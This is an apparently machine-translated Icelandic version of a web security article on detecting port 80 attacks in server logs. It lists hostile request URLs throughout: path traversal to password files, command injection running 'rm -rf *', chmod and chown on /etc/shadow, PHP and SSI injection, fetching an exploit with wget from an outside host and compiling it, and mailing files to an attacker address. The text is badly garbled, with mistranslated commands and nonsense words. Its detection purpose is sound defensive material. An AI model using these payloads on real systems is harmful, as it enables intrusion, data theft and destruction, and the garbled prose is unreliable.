I. Yfirlit
II. Nákvæm lýsing á
III. Nánari
IV. Spillover Greining
V. transcoding
VI. Lokaorð
[Ágrip]
vefurinn 80 og þjónusta vanræksla höfn, á ýmsum vandamálum í öryggismálum halda það út af the gefa út, leyfa sumir jafnvel þessara veikleika í árásarmaður að fá leyfi kerfisstjóra til að slá Zhandianneibu Eftirfarandi eru Zenomorph leið fyrir um 80 árásir á snefill höfn rannsókna, og segja þér hvernig á að finna vandamál frá the skrá þig inn færslur.
[Nánar]
Hér að hluta til í gegnum fjölda Zi Lie, birt á vefþjóni og beitingu þess á almennum árás, og rekur sitt, Lieh eingöngu er fulltrúi meiriháttar árás vektor, þá er enginn listi af allur mynd af árás, þessum hluta verða nákvæma lýsingu á hlutverki hvers árás, og þess hvernig á að notfæra sér þessa veikleika að árás.
(1) "." .. "Og "..." beiðni
Leifar af þessum árásum eru mjög algeng fyrir umsóknir vefur og vefur framreiðslumaður, hver notaður til að leyfa að árásarmaður eða ormur-veira program til breytinga slóð á vefþjóni, til að fá aðgang að lokuðu svæði. Flest CGI forrit sem innihalda þessar veikleikum, ".." beiðni.
Dæmi:
http://host/cgi-bin/lame.cgi?file=../../../../etc/motd
Þetta sýnir árásarmaður Liezi beiðni mosd þessari skrá, ef árásarmaður the bylting getu vefþjón rót skrá, þá fá meiri upplýsingar og til að fá frekari forréttindi.
(2) "% 20" beiðni
% 20 er álög gildi að 16 rými, þó að þetta þýðir ekki að þú getur notað hvað sem er, en þegar þú skoðar þig inn verður að finna það, sumum vefþjóninum umsókn í gangi á þessum toga getur verið í raun til framkvæmda Því ættir þú að fara vandlega yfir the log. Á hinn bóginn, að beiðni getur stundum hjálpað til við að framkvæma nokkrar skipanir.
Dæmi:
http://host/cgi-bin/lame.cgi?page=ls% 20-al |
Þetta Liezi sýnir árásarmaður að keyra Unix skipun, skráningu á öllum verslun skjala beiðni, sem veldur því árásarmaður til aðgang mikilvægur skrá á tölvunni þinni til að hjálpa honum til frekari veita þeim skilyrðum fyrir öflun forréttindi.
(3) "% 00" beiðni
% 00 sögðu 16-bæti sextánskur tómur, hann var fær til bjáni á vefnum forrit og beðið um aðrar tegundir af skrám.
Dæmi:
http://host/cgi-bin/lame.cgi?page=index.html
Þetta gæti verið í gildi fram í vélinni, ef árásarmaður kunnugt um þessa beiðni var vel verður hann frekar horfa á CGI verklagsreglum.
http://host/cgi-bin/lame.cgi?page=../../../../etc/motd
Kannski er CGI program hjartarskinn ekki á móti þessari beiðni vegna þess að það er óskað eftir að kanna skrá nafn viðskeyti, eins og: html.shtml eða annars konar skrár. Flest forrit munu segja þér skrána er ógilt, this tími það vilja segja árásarmaður í skrána skal staf á skrá tegund viðskeyti, svo sem árásarmaður getur fengið kerfisslóð, skrá nafn, sem leiðir til kerfi þínu fleiri viðkvæmar upplýsingar
http://host/cgi-bin/lame.cgi?page=../../../../etc/motd% 00html
Attention þessari beiðni, það mun svindla CGI program að þetta skjal er til að ákvarða viðtekinn skrá tegund, sumum forritum raunveruleg skoðun eins heimskur beiðni skrá, sem er almennt notuð aðferðum árásarmaður.
(4) "|" beiðni
Þetta er pípa staf í unix kerfi, beiðni um aðstoð við framkvæmd ýmissa stjórn kerfi á sama tíma.
Dæmi:
# Köttur access_log | grep-i ".."
(Þessi skipun birtir skrá þig inn í ".." beiðni, sem almennt eru notaðar í árásum og orma finnast)
Oft finna að mörg forrit vefur nota þennan staf þennan líka leiðir til falskar viðvaranir í IDS logs.
Í varkár rannsókn á umsókn þinni, þannig að kostur að draga úr falskur viðvörun á afskipti uppgötvun kerfi.
Hér eru nokkrar af Lieh-Tzu:
http://host/cgi-bin/lame.cgi?page=../../../../bin/ls |
Þessi beiðni stjórn Eftirfarandi eru nokkrar breytingar í Liezi
http://host/cgi-bin/lame.cgi?page=../../../../bin/ls% 20-al% 20/etc |
Þessi beiðni er skráð í unix kerfi / etc möppuna af öllum skrám
http://host/cgi-bin/lame.cgi?page=cat% 20access_log | grep% 20-I% 20 "fatlaður"
Skipunin köttur framkvæmd beiðni og framkvæmd af stjórn grep mun einnig skrá sig út the "fatlaður"
(5) ";" beiðni
Í unix kerfi, þessum toga gerir margar stjórn lína framkvæmd
Dæmi:
# Id; uname-a
(Framkvæmd kt stjórn, fylgismaður við framkvæmd uname stjórn)
Sumir dagskrá með þessum toga, geta leitt til IDS þinn logs viðvörun um bilun, þá ættir þú vel athuga vefur program, svo þú dregið úr hættu á getuleysi IDS áminningar.
(6) " " og " " beiðni
Ætti að athuga logs þinn hljómplata tveggja stafa, af ýmsum ástæðum, sá fyrsti er eðli að bæta gögn í skjali
Dæmi 1:
# Echo þinn "hax0red h0 h0" / etc / motd (motd beiðni skriflegar upplýsingar í þessu skjali)
An árásarmaður geta auðveldlega nota sem beiðninni ofan falsa í vefsíðuna þína. Svo sem eins og hið fræga RDS nýta árásarmaður er oft notaður til að breyta vefsíðum.
Dæmi 2:
http://host/something.php=Hi% 20mom% 20Im% 20Bold!
Html þú vilja taka eftir þessi mál merki hér, hann var líka " "," " stafi slíkar árásir geta ekki valdið því að árásarmaður til að fá aðgang að kerfinu, rugla það fólk heldur að þetta sé lögmætt vefurinn upplýsingar (sem leiðir til Fólk heimsókn á þennan tengil til að heimsækja árásarmaður til að láta heimilisfang, getur þessi beiðni vera umrita í dulmál í 16 álög stafir í formi, svo sem leifar af árás er ekki svo augljós)
(7) "!" Beiðni
Common tungumál á þessa beiðni eðli SS (Server Side Hafa) Ég árás ef árásarmaður er árásarmaður rugla notandi smellir á tengilinn setja, og það sama og hér að ofan.
Dæmi:
http://host1/something.php =
The Lieh-Tzu er árásarmaður getur gert það að skrá á síðuna host2 frá host1 birtist hér að ofan (að sjálfsögðu þurfa gestir að heimsækja tengistillingar the árásarmaður. Fia beiðni breyta má í 16 álög kóðun lagsins, ekki auðvelt að finna)
Á sama tíma, þessi aðferð getur einnig keyrt á vald stjórn vefurinn
Dæmi:
http://host/something.php =
The Lieh litið á ytra kerfi "ID" stjórn, það mun sýna persónuskilríki á vefsvæði notenda, er oftast "enginn" eða "www"
Þetta form gerir einnig fylgir falinn skrá.
Dæmi:
http://host/something.php =
Falin skrá. Htpasswd verða ekki birtar, Apache mun neita að staðfesta slíkar reglur til. HT beiðni formi og TR firmamerki verða framhjá slíkum takmörkunum, og leiða til öryggis vandamála
(8) "," Beiðni
Slíkar árásir notað til að reyna að lítillega setja PHP vefur umsókn aðferðir, það er heimilt að leyfa að framkvæmd þess, allt eftir stillingum framreiðslumaður, og öðrum þáttum í starfi (eins og PHP er stillt á öruggum ham)
Dæmi: http://host/something.php = passthru ("ID ");?
Í nokkrum einföldum PHP forrit, kann að vera til vefur staður á the fjarlægur kerfi notanda réttindi til að framkvæma á hverjum stað stjórn
(9) "" "beiðni
Þetta eðli síðar notað til að framkvæma skipanir í perl, stafina í the vefur umsókn er ekki oft notaður, svo ef þú sérð hana í skrá þig inn þinn, ætti að vera mjög varkár
Dæmi:
http://host/something.cgi = `kt`
Skrifa perl CGI program sem um ræðir myndi hafa í för með framkvæmd persónuskilríki stjórn
[Nánar]
Í eftirfarandi kafla verður fjallað um framkvæmd fleiri árásir gætu stjórn, ásamt þeim gögnum óskað, og ef þú hafa a fjarlægur stjórn framkvæmd galli ætti að vera hvernig til stöðva the uppgötvun. Þessi hluti er bara til að gefa þér góð hugmynd, og segja tölvunni hvað er að gerast, reyna árásarmaður að ráðast á kerfið rekur þitt, en ekki upp öll árásarmaður að nota skipanir og beiðnir.
"/ Bin / LS"
Þessi stjórn fer fram á alla slóðina í mörgum af vefnum umsóknir allra skotgat, ef þú skráir þig inn á mörgum stöðum svo beiðni, það er mögulegt fyrir stórum ytri stjórn framkvæmd varnarleysi, en ekki endilega Wenti getur einnig verið gabb. Enn og aftur minntir á, vefur umsókn skriflega (CGI, ASP, PHP ... etc) er grundvöllur öryggis
Dæmi:
http://host/cgi-bin/bad.cgi?doh=../../../../bin/ls% 20-al |
http://host/cgi-bin/bad.cgi?doh=ls% 20-al;
"Cmd.exe"
Þetta er glugga í skel, ef árásarmaður aðgang og keyra þessa skrifta í the framreiðslumaður stilling samkvæmt þeim skilyrðum leyfðar í Windows vél er hægt að gera neitt, fullt af ormur er í gegnum höfn 80, samskipti við ytri vél
http://host/scripts/something.asp=../../WINNT/system32/cmd.exe?dir+e:
"/ Bin / ID"
Þetta er tveggja tvíundarskrám, vandamál þess og / bin / LS, eins og, ef þú skráir þig inn á mörgum stöðum svo beiðni, það er mögulegt fyrir stórum ytri framkvæmd stjórn varnarleysi, en ekki endilega vandamál getur einnig verið gabb.
Það mun sýna hver hluti tilheyrir sem notandi og hópur
Dæmi:
http://host/cgi-bin/bad.cgi?doh=../../../../bin/id |
http://host/cgi-bin/bad.cgi?doh=id;
"/ Bin / rm"
Þessi skipun getur eytt skrám án þess að rétta notkun er mjög hættuleg
Dæmi:
http://host/cgi-bin/bad.cgi?doh=../../../../bin/rm% 20-rf% 20 * |
http://host/cgi-bin/bad.cgi?doh=rm% 20-rf% 20 *;
"Wget og tftp" stjórn
Þessar skipanir eru oft árásarmaður má fá frekari forréttindi til að hlaða niður skrám, wget er unix skipun undir, má nota til að hlaða niður backdoors, tftp er unix og nt undir stjórn notað til að hlaða niður skrám. Sumir IIS ormur breiða sig við tftp að afrita veira öðrum vélum
Dæmi:
http://host/cgi-bin/bad.cgi?doh=../../../../path/to-wget/wget% 20http: / / host2/Phantasmp.c | http:// gestgjafi / cgi-bin / bad.cgi? doh = wget% 20http: / / www.hwa-security.net/Phantasmp.c;
"Köttur" stjórn
Þessi skipun er notuð til að skoða innihald skrárinnar, notaður til að lesa mikilvægar upplýsingar, svo sem eins og skrá stillingar, lykilorð skrár, trúnaður skrár og skjöl með þér dettur í hug
Dæmi: http://host/cgi-bin/bad.cgi?doh=../../../../bin/cat% 20/etc/motd | http://host/cgi-bin/ bad.cgi? doh = köttur% 20/etc/motd;
"Echo" stjórn
Þessi skipun er notað til að skrifa gögn í skrána, svo sem "index.html"
Dæmi: http://host/cgi-bin/bad.cgi?doh=../../../../bin/echo% 20 "fc-# kívífugl% 20was% 20here"% 20 % 200day.txt | http://host/cgi-bin/bad.cgi?doh=echo% 20 "fc-# kívífugl% 20was% 20here"% 20 % 200day.txt;
"Ps" stjórn
Listar í gangi ferli segja árásarmaður að vélarinnar að keyra hugbúnað í því skyni að fá einhverja hugmynd um öryggismál, til að fá frekari heimildir
Dæmi: http://host/cgi-bin/bad.cgi?doh=../../../../bin/ps% 20-aux | http://host/cgi-bin/bad. CGI? doh = ps% 20-aux;
"Drepa og killall" stjórn
Unix-kerfi til þess að drepa þessu ferli, sem árásarmaður geta notað þessa skipun til að hætta að kerfi þjónusta og ferli getur einnig eyða leifum af árásarmaður, sumir nýta mun framleiða mikið af aðferð barnsins
Dæmi: http://host/cgi-bin/bad.cgi?doh=../bin/kill% 20-9% 200 | http://host/cgi-bin/bad.cgi?doh=kill% 20 -9% 200;
"Uname" stjórn
Þessi skipun segir árásarmaður nafn fjarlægur vél ', um nokkurt skeið, í gegnum þessa vefsíðu til þess að vita hver isp, sem árásarmaður sem kunna að vera heimsótt í dag. Uname-a til að biðja venjulega, þeir munu færa það í annálinn
Dæmi: http://host/cgi-bin/bad.cgi?doh=../../../../bin/uname% 20-a | http://host/cgi-bin/bad. CGI? doh = uname% 20-A;
"CC, gcc, perl, python, etc ..." samantekt / túlkun á stjórn
Árásarmaður gegnum wget eða tftp sækja hetjudáð, og nota cc, gcc þýðanda til að þýða þetta yfir í executable program, og frekari forréttindi aðgang
Dæmi: http://host/cgi-bin/bad.cgi?doh=../../../../bin/cc% 20Phantasmp.c | http://host/cgi-bin/bad. CGI? doh = gcc% 20Phantasmp.c;. / a.out% 20-p% 2031337;
Ef þú skoðar logs að finna í "perl" s "Þessar leiðbeiningar geta verið fjarlæg árásarmaður að sækja perl, python handriti, og reyndi að fá forréttindi sveitarfélaga
"Póstur" stjórn
Árásarmaður oft nota this stjórn kerfi, sumir mikilvæg skjöl til eigin pósthólfi í árásarmaður, en einnig viljugur til e-póstur sprengju árásir eru gerðar
Dæmi: http://host/cgi-bin/bad.cgi?doh=../../../../bin/mail% 20attacker@fuckcnhonker.org% 20
2.168.22.1;
"Chown, chmod, chgrp, chsh, etc ..." og aðrar skipanir
Unix-kerfi til þess að leyfa þeim að breyta skrá leyfi
chown = leyfa stillingu á skrá eigandi chmod = leyfa að setja skrá heimildir chgrp = leyfa eigandanum að breyta hópnum leyfi á skrá chsh = leyfi til að breyta skel notandans
Dæmi: http://host/cgi-bin/bad.cgi?doh=../../../../bin/chmod% 20777% 20index.html | http://host/cgi-bin/ bad.cgi? doh = chmod% 20777% 20index.html; http://host/cgi-bin/bad.cgi?doh=../../../../bin/chown% 20zeno% 20 / etc / master.passwd | http://host/cgi-bin/bad.cgi?doh=chsh% 20/bin/sh; http://host/cgi-bin/bad.cgi?doh=../. . / .. / .. / bin / chgrp% 20nobody% 20/etc/shadow |
"/ Etc / passwd" skrá
Þetta er lykilorðið skrá kerfisins, venjulega skugga burt, og leyfir ekki að sjá the brengla lykilorð, en fyrir árásarmaður hverjir vita hvað er skráður notandi, og alger slóð kerfisins er síðan nafn og aðrar upplýsingar, eins og venjulega við skugga af, svo árásarmaður venjulega skoða / etc / shadow skrá
"/ Etc / master.passwd"
Þessi skrá er BSD kerfi lykilorð skrá inniheldur dulkóðað lykilorð, sem skrá á the rót reikningur er eingöngu lesa-eini, og sumir ófaglærðra árásarmaður opnaði tilraun hans til að lesa innihald inni., Ef the vefur staður er rót forréttindi að hlaupa, þá er árásarmaður getum við lesið efni inni, a einhver fjöldi af vandamál á kerfinu og stjórnandi mun koma hvert á eftir öðru
"/ Etc / shadow"
Inniheldur lykilorð dulkóðuð kerfi, lesa sama á kerfisstjóra og / et / master.passwd næstum
"/ Etc / motd"
Þegar notendur skrá þig inn á unix kerfið, þær upplýsingar sem birtist í "Message dagsins" skrá, er kveðið er mikilvægt kerfi upplýsingar og stjórnandi á notenda sumir af the stilling, notendur sem vilja sjá þá sem eru ekki Einnig inniheldur útgáfa kerfisins upplýsingar um árásarmaður venjulega sjá þessa mynd, til að skilja hvað kerfið er í gangi á árásarmaður, næsta skref er að leita að þessari tegund af kerfi, hetjudáð, og frekari aðgang að kerfinu forréttindi
"/ Etc / gestgjafi"
Skjalið er kveðið ip tölu og net upplýsinga sem árásarmaður getur lært meira um stillingar neti kerfisins
"/ Usr / local / Apache / conf / httpd.conf"
Þetta er Apache vefþjónsins stillingaskrá, sem árásarmaður skil, eins og CGI, SSI og aðrar upplýsingar eru aðgengilegar
"/ Etc / inetd.conf"
Þetta er stillingaskránni inetd þjónusta, sem árásarmaður geta lært fjarlægur vél, hefja þessa þjónustu, hvort á að nota umbúðir til að fá aðgang stjórna, ef umbúðir fannst í gangi, að árásarmaður næsta skrefið verður að athuga "/ etc / allow" og "/ etc / hosts.deny", skrá, og sem kunna að breyta einhverjum stillingum, aðgangur forréttindi
". Htpasswd. Htaccess og. Htgroup"
Þessar skrár eru oftast notuð í vef sannvottun, sem árásarmaður myndi skoða þessar skrár og fá upp notandanafn og lykilorð, inn lykilorðið skrá. Htpasswd er dulkóðuð, brjótast í gegnum nokkur einföld decryption ferli, leyfa óákveðinn greinir í ensku árásarmaður til að opna síðuna vernduð svæði (oftast notandi með sama notandanafn og lykilorð, sem árásarmaður geta jafnvel heimsækja aðrar reikningur)
"Access_log og error_log"
Þessir ert the framreiðslumaður Apache þig inn skrá, skoða árásarmaður oft yfir þessar skrár, líta á þá beiðni eru skráð þær og aðrar beiðnir um mismunandi stöðum
Venjulega er árásarmaður vilja breyta þessum þig inn skrár, svo sem eins og eigin upplýsingar um heimilisfang hans, árásarmaður gegnum port 80 í gegnum kerfið, og þú ert í kerfið heldur ekki að gera öryggisafrit af Gongzuo af engum öðrum upptöku forrit hljóðritun kerfi stöðu, sem Jiang Shi afskipti uppgötvun verður mjög erfitt að vinna
"[Drive-bréf]: winntrepairsam._ eða [aksturs-bréf]: winntrepairsam"
Windows NT kerfi lykilorð skrá, ef ytri stjórn er ekki hægt að innleiða árásarmaður yfirleitt fram á þessum skjölum, þá "l0pht sprunga" af tagi lykilorð sprunga tól til að sprunga, ef árásarmaður reynir að ráðast á lykilorð skrá stjórnandi ', ef tekst þá fjarlægur vél verður árásarmaður fær stjórn
[Yfirfall greining]
Ég segi ekki of mikið í þessari grein, De Guan Yu flæða yfir atriði, ég mun gefa út leiðbeiningar Naxiexianxiang og ummerki um vert og sérstakt áhyggjuefni, oft árásarmaður stuðpúði Gongji transcoding og aðrar leiðir til að ná erfitt að finna
Hér er einföld Lie Zi
Dæmi: http://host/cgi-bin/helloworld?type=AAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAA AA
Þetta Liezi sýnir árásarmaður á forrit til að senda mikið af staf til að prófa forritið a biðminni flæða, höggdeyfir flæða hægt að fá fjarlægur stjórn framkvæmd gestgjafi leyfi, ef eigandinn er setuid að skjóta rótum og málsmeðferð, með gnægð, hægt að fá aðgang að öllu kerfinu, ef ekki eins setuid program, þá er gnægð aðeins með því að keyra notandi heimasíðu's réttindi
Hér má ekki segja öllum kringumstæðum, en þú ættir að skoða reglulega annáll, ef þessi dagur allt í einu fann fullt af beiðnum, en yfirleitt ekki meira en beiðni, þá þýðir það að þú ert sæta flæða yfir árás, auðvitað, má einnig vera Ný net ormur árás
[Transcoding]
Allar árásir og umtal yfir beiðni árásarmaður veit yfirleitt IDS kerfi oft vélrænni stöðva beiðni, oftast árásarmaður vilja nota vefhegðunargögn tól til að breyta beiðni efni snið 16 band, sem leiðir í IDS hunsa þessar beiðnir, Við þekkjum með CGI varnarleysi skönnun tól sem er gott Liezi Whisker. Ef þú skoðar þig inn á þeim tíma fann fjölda 16-band og ekki nokkur algengustu stafina, þá árásarmaður getur reynt að nota ýmsa vegu til að ráðast á vélina þína
A fljótur vegur er skrá þig þinni beiðni um þau 16 álög, eftirlíking það til þinn flettitæki, the flettitæki er hægt að breyta í hægri beiðni og birt innihald beiðni, ef þú ert ekki hugrekki til að taka áhættu, einfalt maður ASCII, geta veitt þér rétt númer.
[Ályktun]
Þessi grein er ekki hægt að greiða allan 80 höfnum árás, en flestar hafa verið vitnað í fleiri en almenn árás, og segja þér hvernig á að stöðva þig inn skrá þína, og hvernig á að bæta við svo sem fjölda IDS reglur, skrifaðu Markmið hennar er að vefur kerfisstjóra ætti að hafa áhyggjur óður í hvaða góða hugmynd á sama tíma, ég vona að þessi grein hjálpa til vefur program vefur verktaki til skrifa betri forrit
Á ATH: Ef þú hefur einhverjar athugasemdir og ábendingar, vinsamlegast sendu tölvupóst admin@cgisecurity.com.